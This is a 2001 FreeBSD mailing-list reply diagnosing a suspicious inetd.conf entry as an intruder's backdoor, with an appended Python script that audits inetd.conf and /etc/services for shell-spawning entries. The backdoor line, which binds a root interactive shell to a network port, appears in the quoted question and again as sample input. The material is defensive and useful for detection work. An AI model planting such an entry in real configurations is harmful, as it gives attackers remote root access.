Date: Thu, 02 Aug 2001 07:01:05 +1000
From: Kal Torak <kaltorak@quake.com.au>
To: Hayden Katzenellenbogen <haydenk@nextlevelinternet.com>
Cc: freebsd-stable@freebsd.org
Subject: Re: Extra Line in my inetd.conf
Message-ID: <3B686E11.7F68E209@quake.com.au>
References: <NFBBKLNOALGIGCIMHGKFGEPOCCAA.haydenk@nextlevelinternet.com>

Hayden Katzenellenbogen wrote:
>
> I have noticed this line at the bottom of some of my inetd.conf files on a
> few of my machines.. it is though not commented out I have commented it out
> as well I have no idea what it does...
>
> anyone care to shed some light on this?
>
> #dlip stream tcp nowait root /bin/sh sh -i

Looks like someone hacked your box...
dlip, whatever it is sure as hell isn't meant to open an interactive shell
with root as the root user!!!

You should log connection attempts on port 7201 and see who tries to
access it...
Also check your /etc/services file to make sure they haven't changed the
dlip port to something else...

If this is on a few of your machines it looks like your whole network is
probably breached...

You have tripwire installed? Now it's time to check your binaries and see what
else is changed...

Really the only way to be sure is to format and reinstall... Who knows what
other back doors they have had time to put in place!

And your firewall should really be blocking that port anyway...

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-stable" in the body of the message
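
The checks suggested in the reply above can be scripted for use across several machines. The following Python code is an added example, not part of the original message or of FreeBSD: it flags inetd.conf entries, active or commented out, whose server program is a shell, and looks up each service's port in /etc/services text. The shell list and the sample input are constructed assumptions.

```python
# Added example: flag inetd.conf entries that hand a network socket to a shell.
SHELLS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh"}  # assumed shell basenames

def parse_services(text):
    """Map (service name or alias, protocol) -> port from /etc/services text."""
    ports = {}
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2 or "/" not in fields[1]:
            continue
        port, proto = fields[1].split("/", 1)
        if port.isdigit():
            for name in [fields[0]] + fields[2:]:
                ports[(name, proto)] = int(port)
    return ports

def audit_inetd(conf_text, services_text):
    """Return one finding per entry (active or commented out) that runs a shell."""
    ports = parse_services(services_text)
    findings = []
    for lineno, raw in enumerate(conf_text.splitlines(), 1):
        stripped = raw.strip()
        fields = stripped.lstrip("#").split()
        # Fields: service, socket type, protocol, wait/nowait, user, program, args
        if len(fields) < 6 or fields[1] not in ("stream", "dgram"):
            continue
        service, _, proto, _, user, program = fields[:6]
        if program.rsplit("/", 1)[-1] not in SHELLS:
            continue
        findings.append({
            "line": lineno, "service": service, "user": user.split(":")[0],
            "program": program, "active": not stripped.startswith("#"),
            # tcp4/tcp6/tcp46 share the tcp entry in /etc/services
            "port": ports.get((service, proto.rstrip("46"))),
        })
    return findings

# Constructed sample input: a stock entry plus the line quoted in the message.
SAMPLE_CONF = """\
ftp stream tcp nowait root /usr/libexec/ftpd ftpd -l
#dlip stream tcp nowait root /bin/sh sh -i
"""
# Constructed services excerpt; 7201 is the port named in the reply.
SAMPLE_SERVICES = "ftp 21/tcp\ndlip 7201/tcp\n"

if __name__ == "__main__":
    for f in audit_inetd(SAMPLE_CONF, SAMPLE_SERVICES):
        state = "ACTIVE" if f["active"] else "commented out"
        print(f"line {f['line']}: {f['service']} port {f['port']} runs "
              f"{f['program']} as {f['user']} ({state})")
```

A port of None in a finding means the service name no longer resolves in the services text supplied, which is the tampering case the reply says to check for.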